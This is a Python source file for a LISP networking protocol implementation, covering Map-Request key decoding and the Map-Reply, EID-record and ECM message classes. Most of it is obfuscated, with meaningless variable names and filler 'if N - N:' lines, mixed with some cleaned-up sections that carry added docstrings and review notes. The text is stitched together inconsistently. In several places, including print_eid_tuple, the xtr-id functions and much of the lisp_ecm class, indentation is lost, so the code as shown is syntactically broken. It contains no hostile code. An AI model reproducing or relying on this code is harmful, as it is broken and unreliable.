    # Re-decode with a key object matching the offered cipher suite.
    Iii = [ LISP_CS_25519_CBC , LISP_CS_25519_GCM ,
     LISP_CS_25519_CHACHA ]
    if ( i1ii1iiI11ii1II1 . cipher_suite in Iii ) :
     if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CBC or
      i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_GCM ) :
      ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_chacha = False )
     if 75 - 75: I11i . o0oOOo0O0Ooo - i11iIiiIii / I11i
     if ( i1ii1iiI11ii1II1 . cipher_suite == LISP_CS_25519_CHACHA ) :
      ii1i1I1111ii = lisp_keys ( 1 , do_poly = True , do_chacha = True )
     if 100 - 100: i11iIiiIii * i11iIiiIii . iIii1I11I1II1 % iII111i * I1ii11iIi11i
    else :
     ii1i1I1111ii = lisp_keys ( 1 , do_poly = False , do_curve = False ,
      do_chacha = False )
     if 17 - 17: Ii1I * IiII * i11iIiiIii / I1ii11iIi11i / i11iIiiIii
    packet = ii1i1I1111ii . decode_lcaf ( OO0o0 , 0 )
    if ( packet == None ) : return ( None )
    if 23 - 23: OoooooooOO + i11iIiiIii / Oo0Ooo / iII111i . iII111i * I1IiiI
    # The RLOC address itself follows the LCAF.
    if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
    O000oOOoOOO = struct . unpack ( "H" , packet [ : ooOoooOoo0oO ] ) [ 0 ]
    III1iii1 . afi = socket . ntohs ( O000oOOoOOO )
    if ( len ( packet ) < III1iii1 . addr_length ( ) ) : return ( None )
    if 98 - 98: IiII
    packet = III1iii1 . unpack_address ( packet [ ooOoooOoo0oO : : ] )
    if ( packet == None ) : return ( None )
    if 23 - 23: I11i / i1IIi * OoO0O00
    if ( ooOO0oO0 ) :
     # Crypto disabled: keep the RLOC but ignore the key material.
     self . itr_rlocs . append ( III1iii1 )
     self . itr_rloc_count -= 1
     continue
    if 51 - 51: OOooOOo - OoooooooOO / OoooooooOO % OoooooooOO
    if 85 - 85: OoO0O00 . o0oOOo0O0Ooo . I1IiiI
    oo0o00OO = lisp_build_crypto_decap_lookup_key ( III1iii1 , port )
    if 75 - 75: iIii1I11I1II1 - Ii1I % O0 % IiII
    II1II1iiIiI = None
    if ( lisp_nat_traversal and III1iii1 . is_private_address ( ) and source ) : III1iii1 = source
    if 31 - 31: I1Ii111 . I1ii11iIi11i + IiII
    if 65 - 65: I1IiiI * O0 * Oo0Ooo . O0
    # Look up any previously negotiated decap keys for this RLOC.
    if ( lisp_crypto_keys_by_rloc_decap . has_key ( oo0o00OO ) ) :
     oOoo0oO = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ]
     II1II1iiIiI = oOoo0oO [ 1 ] if oOoo0oO and oOoo0oO [ 1 ] else None
    if 23 - 23: OoO0O00 / IiII * II111iiii
    if 32 - 32: I1Ii111 - iIii1I11I1II1 / I11i * OoO0O00 * OoO0O00
    oo0Oo0oo = True
    if ( II1II1iiIiI ) :
     if ( II1II1iiIiI . compare_keys ( ii1i1I1111ii ) ) :
      # Same key material as before: keep the stored keys.
      self . keys = [ None , II1II1iiIiI , None , None ]
      lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oo0o00OO , False ) ) )
      if 71 - 71: OOooOOo
     else :
      # ITR sent new key material: rekey, preserving uptime.
      oo0Oo0oo = False
      oo0oO = bold ( "Remote decap-rekeying" , False )
      lprint ( "{} for RLOC {}" . format ( oo0oO , red ( oo0o00OO ,
       False ) ) )
      ii1i1I1111ii . copy_keypair ( II1II1iiIiI )
      ii1i1I1111ii . uptime = II1II1iiIiI . uptime
      II1II1iiIiI = None
      if 11 - 11: o0oOOo0O0Ooo * OoO0O00
      if 92 - 92: OoOoOO00 . Oo0Ooo * I11i
      if 86 - 86: O0
    if ( II1II1iiIiI == None ) :
     self . keys = [ None , ii1i1I1111ii , None , None ]
     if ( lisp_i_am_etr == False and lisp_i_am_rtr == False ) :
      # Not a decapsulator: note the keys but don't compute secrets.
      ii1i1I1111ii . local_public_key = None
      lprint ( "{} for {}" . format ( bold ( "Ignoring decap-keys" ,
       False ) , red ( oo0o00OO , False ) ) )
     elif ( ii1i1I1111ii . remote_public_key != None ) :
      if ( oo0Oo0oo ) :
       lprint ( "{} for RLOC {}" . format ( bold ( "New decap-keying" , False ) ,
        # II111iiii % I1IiiI % Ii1I * I1ii11iIi11i
        red ( oo0o00OO , False ) ) )
       if 74 - 74: o0oOOo0O0Ooo / OoO0O00 + iII111i - i1IIi / OoooooooOO / I1ii11iIi11i
      # Complete the DH exchange and store keys for this RLOC/port.
      ii1i1I1111ii . compute_shared_key ( "decap" )
      ii1i1I1111ii . add_key_by_rloc ( oo0o00OO , False )
      if 56 - 56: oO0o + I1IiiI . I11i
      if 67 - 67: IiII / o0oOOo0O0Ooo + I11i % iII111i - ooOoO0o - I1IiiI
      if 44 - 44: Ii1I . o0oOOo0O0Ooo . iIii1I11I1II1 + OoooooooOO - I1IiiI
      if 22 - 22: I11i * I1ii11iIi11i . OoooooooOO / Oo0Ooo / Ii1I
   self . itr_rlocs . append ( III1iii1 )
   self . itr_rloc_count -= 1
  if 54 - 54: I1Ii111 % Ii1I + ooOoO0o
  if 45 - 45: Ii1I / oO0o * I1Ii111 . Ii1I
  # Target EID-record: reserved byte, mask-len, AFI.
  ooOoooOoo0oO = struct . calcsize ( "BBH" )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 25 - 25: I1ii11iIi11i / I1ii11iIi11i
  Ii1 , iIi1iii1 , O000oOOoOOO = struct . unpack ( "BBH" , packet [ : ooOoooOoo0oO ] )
  self . subscribe_bit = ( Ii1 & 0x80 )
  self . target_eid . afi = socket . ntohs ( O000oOOoOOO )
  packet = packet [ ooOoooOoo0oO : : ]
  if 79 - 79: Oo0Ooo - OoO0O00 % Oo0Ooo . II111iiii
  self . target_eid . mask_len = iIi1iii1
  if ( self . target_eid . afi == LISP_AFI_LCAF ) :
   packet , o0Ooo0Oooo0o = self . target_eid . lcaf_decode_eid ( packet )
   if ( packet == None ) : return ( None )
   if ( o0Ooo0Oooo0o ) : self . target_group = o0Ooo0Oooo0o
  else :
   packet = self . target_eid . unpack_address ( packet )
   if ( packet == None ) : return ( None )
   # NOTE(review): this skips a further calcsize("BBH") bytes after
   # the address -- confirm the wire format expects that padding.
   packet = packet [ ooOoooOoo0oO : : ]
  if 22 - 22: oO0o / II111iiii . OoOoOO00
  return ( packet )
if 9 - 9: i11iIiiIii + ooOoO0o . iIii1I11I1II1 * OoOoOO00
if 4 - 4: I1Ii111 + iII111i % O0
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . target_eid , self . target_group ) )
if 98 - 98: i1IIi + I1Ii111 - I1ii11iIi11i . OoooooooOO / O0 / iII111i
if 66 - 66: i1IIi % OoooooooOO * i11iIiiIii + oO0o * O0 / OoO0O00
def encode_xtr_id ( self , packet ) :
OoOO = self . xtr_id >> 64
IiI1i111III = self . xtr_id & 0xffffffffffffffff
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
packet += struct . pack ( "QQ" , OoOO , IiI1i111III )
return ( packet )
if 14 - 14: I1IiiI . IiII
if 29 - 29: OoooooooOO / IiII + OoOoOO00 - I1Ii111 + IiII . i1IIi
def decode_xtr_id ( self , packet ) :
ooOoooOoo0oO = struct . calcsize ( "QQ" )
if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
packet = packet [ len ( packet ) - ooOoooOoo0oO : : ]
OoOO , IiI1i111III = struct . unpack ( "QQ" , packet [ : ooOoooOoo0oO ] )
OoOO = byte_swap_64 ( OoOO )
IiI1i111III = byte_swap_64 ( IiI1i111III )
self . xtr_id = ( OoOO << 64 ) | IiI1i111III
return ( True )
if 26 - 26: i11iIiiIii - II111iiii
if 43 - 43: I1IiiI
if 35 - 35: ooOoO0o + OoOoOO00 * OoooooooOO - II111iiii
if 19 - 19: i1IIi / Ii1I / OoOoOO00 . I1IiiI / Ii1I % o0oOOo0O0Ooo
if 39 - 39: ooOoO0o - OoooooooOO
if 88 - 88: i1IIi + iIii1I11I1II1 * i11iIiiIii - OoooooooOO % o0oOOo0O0Ooo
if 74 - 74: ooOoO0o - i11iIiiIii
if 34 - 34: IiII + I1Ii111 + Oo0Ooo / II111iiii
if 33 - 33: Ii1I . i1IIi - II111iiii - OoO0O00
if 31 - 31: I11i - OoOoOO00 / o0oOOo0O0Ooo * OoOoOO00 / Oo0Ooo + o0oOOo0O0Ooo
if 46 - 46: IiII * OoO0O00 / OOooOOo + Oo0Ooo
if 24 - 24: ooOoO0o % OOooOOo . O0 * Oo0Ooo
if 52 - 52: O0 . I1Ii111 + iII111i / i11iIiiIii
if 52 - 52: oO0o % Oo0Ooo * II111iiii
if 24 - 24: i11iIiiIii * i1IIi * i1IIi
if 27 - 27: i1IIi - oO0o + OOooOOo
if 3 - 3: IiII % I1Ii111 . OoooooooOO
if 19 - 19: I1Ii111 * Ii1I - oO0o
if 78 - 78: OoO0O00 - Ii1I / OOooOOo
if 81 - 81: OoOoOO00
if 21 - 21: iII111i / OOooOOo % IiII
if 51 - 51: I11i + ooOoO0o / I1IiiI
if 3 - 3: iIii1I11I1II1 / OOooOOo % oO0o . Ii1I - Ii1I
if 55 - 55: i11iIiiIii % OoooooooOO + O0
if 7 - 7: ooOoO0o - i11iIiiIii * iII111i / Ii1I - o0oOOo0O0Ooo
if 62 - 62: o0oOOo0O0Ooo - iIii1I11I1II1 . I11i . Ii1I * Ii1I
if 24 - 24: I11i
if 93 - 93: I1IiiI % OoO0O00 / i11iIiiIii / I11i
if 60 - 60: ooOoO0o - Ii1I . I1IiiI * oO0o * i11iIiiIii
if 29 - 29: OoO0O00 - Oo0Ooo . oO0o / OoO0O00 % i11iIiiIii
if 26 - 26: ooOoO0o . I1Ii111 / II111iiii % Ii1I
if 82 - 82: OOooOOo % O0 % iIii1I11I1II1 % IiII + i11iIiiIii
class lisp_map_reply():
    """A LISP Map-Reply message header: flag bits, hop-count,
    record-count, and nonce.  EID-records that follow the header are
    parsed separately by the caller.

    Fix over the original: uses the `in` operator instead of the
    long-deprecated dict.has_key() (removed in Python 3); behavior is
    identical.
    """

    def __init__(self):
        self.rloc_probe = False
        self.echo_nonce_capable = False
        self.security = False
        self.record_count = 0
        self.hop_count = 0
        self.nonce = 0
        # Filled in by decode() when a crypto-key exchange matched nonce.
        self.keys = None

    def print_map_reply(self):
        """Log a one-line summary of this Map-Reply's header fields."""
        line = ("{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " +
            "nonce: 0x{}")
        lprint(line.format(bold("Map-Reply", False),
            "R" if self.rloc_probe else "r",
            "E" if self.echo_nonce_capable else "e",
            "S" if self.security else "s", self.hop_count,
            self.record_count, lisp_hex_string(self.nonce)))

    def encode(self):
        """Return the packed 12-byte Map-Reply header (flags word in
        network byte order followed by the 64-bit nonce)."""
        first_long = (LISP_MAP_REPLY << 28) | self.record_count
        first_long |= self.hop_count << 8
        if (self.rloc_probe): first_long |= 0x08000000
        if (self.echo_nonce_capable): first_long |= 0x04000000
        if (self.security): first_long |= 0x02000000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        return(packet)

    def decode(self, packet):
        """Parse a Map-Reply header from the head of *packet*; return
        the remaining bytes, or None when *packet* is too short.  Also
        claims any pending decap crypto keys stored under this nonce."""
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        first_long = socket.ntohl(first_long)
        self.rloc_probe = True if (first_long & 0x08000000) else False
        self.echo_nonce_capable = True if (first_long & 0x04000000) else False
        self.security = True if (first_long & 0x02000000) else False
        self.hop_count = (first_long >> 8) & 0xff
        self.record_count = first_long & 0xff
        self.nonce = nonce[0]

        # Nonce matches an outstanding key exchange: take ownership of
        # the keys and remove them from the pending-by-nonce table.
        if (self.nonce in lisp_crypto_keys_by_nonce):
            self.keys = lisp_crypto_keys_by_nonce[self.nonce]
            self.keys[1].delete_key_by_nonce(self.nonce)

        return(packet)
if 77 - 77: Oo0Ooo . OoO0O00 % O0 - OoO0O00 - Oo0Ooo
if 95 - 95: IiII * II111iiii % o0oOOo0O0Ooo * Oo0Ooo . I11i
if 46 - 46: II111iiii - OoO0O00 % ooOoO0o
if 97 - 97: OoO0O00 . OoOoOO00
if 78 - 78: I1ii11iIi11i + I1ii11iIi11i . OoOoOO00 - IiII * iIii1I11I1II1 * O0
if 26 - 26: OoooooooOO + oO0o + OoO0O00 . O0
if 46 - 46: OoooooooOO - Oo0Ooo * I1Ii111 * OOooOOo * I1Ii111 . oO0o
if 96 - 96: Ii1I / IiII % o0oOOo0O0Ooo + I11i
if 46 - 46: OoO0O00 * I1IiiI
if 25 - 25: I1Ii111 . IiII % O0 % i1IIi
if 53 - 53: O0 % ooOoO0o
if 41 - 41: IiII
if 29 - 29: ooOoO0o
if 70 - 70: oO0o . O0 % I11i % IiII - I11i * I1ii11iIi11i
if 22 - 22: i1IIi
if 82 - 82: oO0o . iIii1I11I1II1 - I1ii11iIi11i
if 55 - 55: Oo0Ooo % Ii1I . iIii1I11I1II1 * I1Ii111
if 33 - 33: O0 - I1IiiI / I1ii11iIi11i / OoO0O00 + iII111i - oO0o
if 27 - 27: I1Ii111 + ooOoO0o - I1Ii111 % i11iIiiIii * Oo0Ooo * o0oOOo0O0Ooo
if 88 - 88: OOooOOo
if 25 - 25: OoO0O00 + o0oOOo0O0Ooo . ooOoO0o - Ii1I . oO0o * Ii1I
if 85 - 85: i1IIi
if 94 - 94: OoooooooOO . O0 / OoooooooOO
if 67 - 67: i11iIiiIii + OoOoOO00
if 50 - 50: ooOoO0o . i1IIi + I1ii11iIi11i . OOooOOo
if 97 - 97: I1IiiI
if 63 - 63: O0 - OoOoOO00 / i11iIiiIii / OoooooooOO / ooOoO0o / II111iiii
if 45 - 45: II111iiii . OoO0O00 + OoO0O00 * iIii1I11I1II1
if 23 - 23: IiII * OoOoOO00 % Ii1I / Ii1I - ooOoO0o - OOooOOo
if 86 - 86: OOooOOo . OoooooooOO * I1IiiI - Oo0Ooo / i11iIiiIii * iII111i
if 56 - 56: I1IiiI . I11i % iII111i
if 33 - 33: I11i / OOooOOo - OOooOOo / i11iIiiIii * OoOoOO00 + O0
class lisp_eid_record ( ) :
 """One EID-record as carried in LISP control messages: record TTL,
 action and flag bits, map-version, signature count, and the
 (EID, group) prefix pair.  Encodes to and decodes from the
 "IBBHHH"-headed wire format.
 """
 def __init__ ( self ) :
  self . record_ttl = 0
  self . rloc_count = 0
  self . action = 0
  self . authoritative = False
  self . ddt_incomplete = False
  self . signature_count = 0
  self . map_version = 0
  self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  # NOTE(review): record_ttl is redundantly initialized twice.
  self . record_ttl = 0
 if 2 - 2: i11iIiiIii % I1IiiI
 if 90 - 90: II111iiii
 def print_prefix ( self ) :
  """Return the EID prefix (or (S,G) pair when a group is set),
  colored green for log output."""
  if ( self . group . is_null ( ) ) :
   return ( green ( self . eid . print_prefix ( ) , False ) )
  if 2 - 2: Ii1I - OoooooooOO - i11iIiiIii % Oo0Ooo / Ii1I
  return ( green ( self . eid . print_sg ( self . group ) , False ) )
 if 77 - 77: o0oOOo0O0Ooo . o0oOOo0O0Ooo * I1Ii111 + OOooOOo - i11iIiiIii
 if 45 - 45: I1IiiI . I1IiiI - Oo0Ooo * OOooOOo
 def print_ttl ( self ) :
  """Return the TTL as a display string.  The TTL field is in minutes
  unless the high bit is set, in which case it is in seconds."""
  oo0o = self . record_ttl
  if ( self . record_ttl & 0x80000000 ) :
   oo0o = str ( self . record_ttl & 0x7fffffff ) + " secs"
  elif ( ( oo0o % 60 ) == 0 ) :
   # Python 2 integer division: whole minutes -> hours.
   oo0o = str ( oo0o / 60 ) + " hours"
  else :
   oo0o = str ( oo0o ) + " mins"
  if 6 - 6: II111iiii * IiII
  return ( oo0o )
 if 51 - 51: Ii1I . i11iIiiIii + oO0o % OoOoOO00
 if 97 - 97: OOooOOo . OOooOOo . iII111i . iII111i
 def store_ttl ( self ) :
  """Return the TTL normalized to seconds (minutes * 60, or the raw
  value when the high seconds-bit is set)."""
  oo0o = self . record_ttl * 60
  if ( self . record_ttl & 0x80000000 ) : oo0o = self . record_ttl & 0x7fffffff
  return ( oo0o )
 if 63 - 63: O0 * IiII / Oo0Ooo . I1IiiI . I1IiiI / i11iIiiIii
 if 17 - 17: iIii1I11I1II1 / OoO0O00 - II111iiii
 def print_record ( self , indent , ddt ) :
  """Log this EID-record's fields, prefixed by *indent*.  *ddt*
  selects the Map-Referral action strings over the Map-Reply ones."""
  IiiIIiIi1i11i = ""
  O00o0o00O0O = ""
  I1iIi1I1I1i = bold ( "invalid-action" , False )
  if ( ddt ) :
   if ( self . action < len ( lisp_map_referral_action_string ) ) :
    I1iIi1I1I1i = lisp_map_referral_action_string [ self . action ]
    I1iIi1I1I1i = bold ( I1iIi1I1I1i , False )
   IiiIIiIi1i11i = ( ", " + bold ( "ddt-incomplete" , False ) ) if self . ddt_incomplete else ""
   if 39 - 39: iIii1I11I1II1 / I1ii11iIi11i + i1IIi + OoO0O00 + I1IiiI
   O00o0o00O0O = ( ", sig-count: " + str ( self . signature_count ) ) if ( self . signature_count != 0 ) else ""
   if 82 - 82: Oo0Ooo . i11iIiiIii + i11iIiiIii
   if 74 - 74: oO0o . i11iIiiIii / iIii1I11I1II1 - I1ii11iIi11i * ooOoO0o - O0
  else :
   if ( self . action < len ( lisp_map_reply_action_string ) ) :
    I1iIi1I1I1i = lisp_map_reply_action_string [ self . action ]
    if ( self . action != LISP_NO_ACTION ) :
     I1iIi1I1I1i = bold ( I1iIi1I1I1i , False )
 if 75 - 75: iIii1I11I1II1 . I1IiiI - Ii1I % OoOoOO00
 if 38 - 38: i1IIi - oO0o . OoooooooOO
 if 40 - 40: I11i
 if 44 - 44: ooOoO0o
  # Negative afi values are internal LCAF encodings.
  O000oOOoOOO = LISP_AFI_LCAF if ( self . eid . afi < 0 ) else self . eid . afi
  oOOo0ooO0 = ( "{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
   "{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}" )
  if 35 - 35: II111iiii + iII111i / I1ii11iIi11i * I1IiiI . I11i
  lprint ( oOOo0ooO0 . format ( indent , self . print_ttl ( ) , self . rloc_count ,
   I1iIi1I1I1i , "auth" if ( self . authoritative is True ) else "non-auth" ,
   IiiIIiIi1i11i , O00o0o00O0O , self . map_version , O000oOOoOOO ,
   green ( self . print_prefix ( ) , False ) ) )
 if 97 - 97: I1IiiI / o0oOOo0O0Ooo
 if 13 - 13: I1ii11iIi11i
 def encode ( self ) :
  """Return this EID-record packed in wire format: the "IBBHHH"
  header followed by the address in (S,G) LCAF, geo-coord,
  instance-id LCAF, or plain AFI encoding."""
  # Action/flag bits share one 16-bit field.
  OOo000 = self . action << 13
  if ( self . authoritative ) : OOo000 |= 0x1000
  if ( self . ddt_incomplete ) : OOo000 |= 0x800
  if 40 - 40: I1ii11iIi11i * iIii1I11I1II1 % OoOoOO00
  if 50 - 50: i11iIiiIii + ooOoO0o
  if 41 - 41: I1IiiI * OoO0O00 + IiII / OoO0O00 . I1Ii111
  if 2 - 2: O0 % o0oOOo0O0Ooo
  # A non-zero instance-id or an (S,G) entry forces LCAF encoding.
  O000oOOoOOO = self . eid . afi if ( self . eid . instance_id == 0 ) else LISP_AFI_LCAF
  if ( O000oOOoOOO < 0 ) : O000oOOoOOO = LISP_AFI_LCAF
  iiI1 = ( self . group . is_null ( ) == False )
  if ( iiI1 ) : O000oOOoOOO = LISP_AFI_LCAF
  if 64 - 64: OoOoOO00
  iIiiii = ( self . signature_count << 12 ) | self . map_version
  iIi1iii1 = 0 if self . eid . is_binary ( ) == False else self . eid . mask_len
  if 25 - 25: II111iiii + I11i
  IIii1i = struct . pack ( "IBBHHH" , socket . htonl ( self . record_ttl ) ,
   self . rloc_count , iIi1iii1 , socket . htons ( OOo000 ) ,
   socket . htons ( iIiiii ) , socket . htons ( O000oOOoOOO ) )
  if 97 - 97: O0 + OOooOOo % OoOoOO00 * I11i . iIii1I11I1II1
  if 94 - 94: oO0o
  if 53 - 53: ooOoO0o + iII111i * i1IIi + I1IiiI
  if 89 - 89: I1IiiI / II111iiii - OoOoOO00 % o0oOOo0O0Ooo
  if ( iiI1 ) :
   # (S,G) multicast entry.
   IIii1i += self . eid . lcaf_encode_sg ( self . group )
   return ( IIii1i )
  if 1 - 1: OoooooooOO . I11i / OoOoOO00 + o0oOOo0O0Ooo % i1IIi
  if 1 - 1: OoooooooOO - OoO0O00 - OoooooooOO / iII111i
  if 70 - 70: Ii1I + I1ii11iIi11i . II111iiii * i11iIiiIii
  if 87 - 87: Ii1I / I1Ii111 % OoOoOO00 * I1ii11iIi11i - OoooooooOO / OoOoOO00
  if 24 - 24: I11i . OOooOOo * i1IIi . I1ii11iIi11i / ooOoO0o / O0
  if ( self . eid . afi == LISP_AFI_GEO_COORD and self . eid . instance_id == 0 ) :
   # Geo-coord EID: drop the placeholder AFI just packed and append
   # the geo encoding instead.
   IIii1i = IIii1i [ 0 : - 2 ]
   IIii1i += self . eid . address . encode_geo ( )
   return ( IIii1i )
  if 62 - 62: o0oOOo0O0Ooo % II111iiii
  if 22 - 22: oO0o - o0oOOo0O0Ooo
  if 89 - 89: OOooOOo
  if 34 - 34: iII111i . OOooOOo
  if 13 - 13: OoO0O00 * OOooOOo + oO0o
  if ( O000oOOoOOO == LISP_AFI_LCAF ) :
   # Instance-id LCAF wrapping of the EID.
   IIii1i += self . eid . lcaf_encode_iid ( )
   return ( IIii1i )
  if 21 - 21: i11iIiiIii . Ii1I % i1IIi * Ii1I . oO0o + Ii1I
  if 92 - 92: i1IIi + OoO0O00 * I11i
  if 70 - 70: Oo0Ooo
  if 93 - 93: iII111i . I1ii11iIi11i . Oo0Ooo . oO0o . OoooooooOO
  if 51 - 51: O0 - iII111i
  # Plain AFI-encoded address.
  IIii1i += self . eid . pack_address ( )
  return ( IIii1i )
 if 65 - 65: O0 / II111iiii * IiII % Ii1I + o0oOOo0O0Ooo
 if 43 - 43: I1Ii111 + OoO0O00 * OoooooooOO
 def decode ( self , packet ) :
  """Parse one EID-record from the head of *packet*; return the
  remaining bytes, or None when the header is truncated."""
  O00oO00oOO00O = "IBBHHH"
  ooOoooOoo0oO = struct . calcsize ( O00oO00oOO00O )
  if ( len ( packet ) < ooOoooOoo0oO ) : return ( None )
  if 85 - 85: iII111i + OOooOOo
  self . record_ttl , self . rloc_count , self . eid . mask_len , OOo000 , self . map_version , self . eid . afi = struct . unpack ( O00oO00oOO00O , packet [ : ooOoooOoo0oO ] )
  if 36 - 36: OoO0O00 % II111iiii * O0 + II111iiii - oO0o - i1IIi
  if 53 - 53: Ii1I - OOooOOo
  if 75 - 75: iII111i % O0 - I11i - I1ii11iIi11i + I1IiiI - I1IiiI
  # Convert from network byte order and crack the packed bit fields.
  self . record_ttl = socket . ntohl ( self . record_ttl )
  OOo000 = socket . ntohs ( OOo000 )
  self . action = ( OOo000 >> 13 ) & 0x7
  self . authoritative = True if ( ( OOo000 >> 12 ) & 1 ) else False
  self . ddt_incomplete = True if ( ( OOo000 >> 11 ) & 1 ) else False
  self . map_version = socket . ntohs ( self . map_version )
  self . signature_count = self . map_version >> 12
  self . map_version = self . map_version & 0xfff
  self . eid . afi = socket . ntohs ( self . eid . afi )
  self . eid . instance_id = 0
  packet = packet [ ooOoooOoo0oO : : ]
  if 87 - 87: i1IIi % Ii1I % i1IIi + iIii1I11I1II1
  if 23 - 23: iIii1I11I1II1 * I11i . I1Ii111 - o0oOOo0O0Ooo
  if 66 - 66: I1IiiI * I1Ii111 / i11iIiiIii / OOooOOo
  if 19 - 19: ooOoO0o % iIii1I11I1II1 * OoooooooOO
  if ( self . eid . afi == LISP_AFI_LCAF ) :
   # LCAF-encoded EID; may yield an (S,G) group as well.
   packet , O0o00oOOOO00 = self . eid . lcaf_decode_eid ( packet )
   if ( O0o00oOOOO00 ) : self . group = O0o00oOOOO00
   self . group . instance_id = self . eid . instance_id
   return ( packet )
  if 53 - 53: OoOoOO00 . oO0o - OOooOOo . II111iiii * i11iIiiIii + OOooOOo
  if 99 - 99: I1ii11iIi11i % Oo0Ooo
  packet = self . eid . unpack_address ( packet )
  return ( packet )
 if 31 - 31: o0oOOo0O0Ooo - II111iiii * OOooOOo . OOooOOo - oO0o
 if 57 - 57: OOooOOo / i11iIiiIii / I1Ii111 - Oo0Ooo . iIii1I11I1II1
 def print_eid_tuple ( self ) :
  """Return the (EID, group) pair formatted for log output."""
  return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 84 - 84: IiII
if 42 - 42: O0 . I1Ii111 / I11i
if 69 - 69: OoOoOO00 / I1Ii111 * I1IiiI
if 76 - 76: O0 + II111iiii * OoO0O00
if 1 - 1: o0oOOo0O0Ooo
if 34 - 34: o0oOOo0O0Ooo + OOooOOo . OoO0O00 + I1IiiI + OoooooooOO
if 90 - 90: Ii1I / OoOoOO00 - iIii1I11I1II1 / i1IIi * I1Ii111 - ooOoO0o
if 2 - 2: iII111i * I11i * ooOoO0o + i11iIiiIii + oO0o
if 81 - 81: o0oOOo0O0Ooo * OoO0O00
if 18 - 18: i11iIiiIii / o0oOOo0O0Ooo - oO0o . I11i * i1IIi
if 67 - 67: Ii1I
if 64 - 64: OoOoOO00 + iII111i * OoOoOO00 - I1IiiI * OoooooooOO
if 27 - 27: II111iiii + i11iIiiIii
if 32 - 32: i1IIi
if 76 - 76: II111iiii % ooOoO0o - I1ii11iIi11i
if 50 - 50: II111iiii / I1IiiI . Ii1I % i11iIiiIii
if 66 - 66: oO0o / OOooOOo / iII111i
if 5 - 5: I1Ii111 . oO0o
if 77 - 77: iII111i / i11iIiiIii
if 20 - 20: O0 . I11i
if 67 - 67: OoOoOO00 - ooOoO0o - iIii1I11I1II1
if 31 - 31: II111iiii + o0oOOo0O0Ooo * i11iIiiIii . o0oOOo0O0Ooo
if 73 - 73: oO0o / OOooOOo * II111iiii % OoooooooOO - i1IIi - ooOoO0o
if 43 - 43: o0oOOo0O0Ooo + Ii1I % OoO0O00 . I1Ii111 + i1IIi
if 85 - 85: Oo0Ooo % I1ii11iIi11i / OOooOOo
if 65 - 65: ooOoO0o + IiII - OoOoOO00 % II111iiii - iIii1I11I1II1
if 39 - 39: I1IiiI + I1ii11iIi11i - i11iIiiIii
if 43 - 43: iIii1I11I1II1
if 73 - 73: OoOoOO00 + o0oOOo0O0Ooo
if 58 - 58: i1IIi * I1ii11iIi11i % iII111i . OoO0O00 % IiII % I11i
if 63 - 63: I1ii11iIi11i % ooOoO0o % I1ii11iIi11i
# IP protocol number for UDP; packed into the inner IP header's
# protocol field by lisp_ecm.encode().
LISP_UDP_PROTOCOL = 17
# Default IP TTL for the inner header of an Encapsulated Control Message.
LISP_DEFAULT_ECM_TTL = 128
if 71 - 71: Ii1I
class lisp_ecm ( ) :
def __init__ ( self , sport ) :
self . security = False
self . ddt = False
self . to_etr = False
self . to_ms = False
self . length = 0
self . ttl = LISP_DEFAULT_ECM_TTL
self . protocol = LISP_UDP_PROTOCOL
self . ip_checksum = 0
self . source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . dest = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . udp_sport = sport
self . udp_dport = LISP_CTRL_PORT
self . udp_checksum = 0
self . udp_length = 0
self . afi = LISP_AFI_NONE
if 43 - 43: o0oOOo0O0Ooo / ooOoO0o
if 88 - 88: i11iIiiIii - i1IIi + Oo0Ooo - O0
def print_ecm ( self ) :
oOOo0ooO0 = ( "{} -> flags: {}{}{}{}, " + "inner IP: {} -> {}, inner UDP: {} -> {}" )
if 50 - 50: I1ii11iIi11i
lprint ( oOOo0ooO0 . format ( bold ( "ECM" , False ) , "S" if self . security else "s" ,
"D" if self . ddt else "d" , "E" if self . to_etr else "e" ,
"M" if self . to_ms else "m" ,
green ( self . source . print_address ( ) , False ) ,
green ( self . dest . print_address ( ) , False ) , self . udp_sport ,
self . udp_dport ) )
if 37 - 37: oO0o % iII111i / II111iiii / OoO0O00 - IiII - ooOoO0o
 def encode ( self , packet , inner_source , inner_dest ) :
  """Build the ECM wrapper headers for *packet*.

  Returns the concatenated ECM word + inner IP header + inner UDP
  header; *packet* itself is NOT included in the return value -- it
  is only used to compute the inner lengths.  The caller appends the
  control payload after these headers.
  """
  # Inner UDP length = control payload plus the 8-byte UDP header.
  self . udp_length = len ( packet ) + 8
  self . source = inner_source
  self . dest = inner_dest
  if ( inner_dest . is_ipv4 ( ) ) :
   self . afi = LISP_AFI_IPV4
   # IPv4 total-length includes the 20-byte IP header.
   self . length = self . udp_length + 20
  if 69 - 69: I1ii11iIi11i . OoooooooOO % I1Ii111
  if ( inner_dest . is_ipv6 ( ) ) :
   self . afi = LISP_AFI_IPV6
   # IPv6 payload-length excludes the 40-byte IPv6 header.
   self . length = self . udp_length
  if 79 - 79: I1IiiI - IiII . OoooooooOO - I1ii11iIi11i
  if 79 - 79: OOooOOo + o0oOOo0O0Ooo % iII111i . oO0o
  if 49 - 49: Ii1I + i11iIiiIii * OoOoOO00 . OoOoOO00 . I1ii11iIi11i . Oo0Ooo
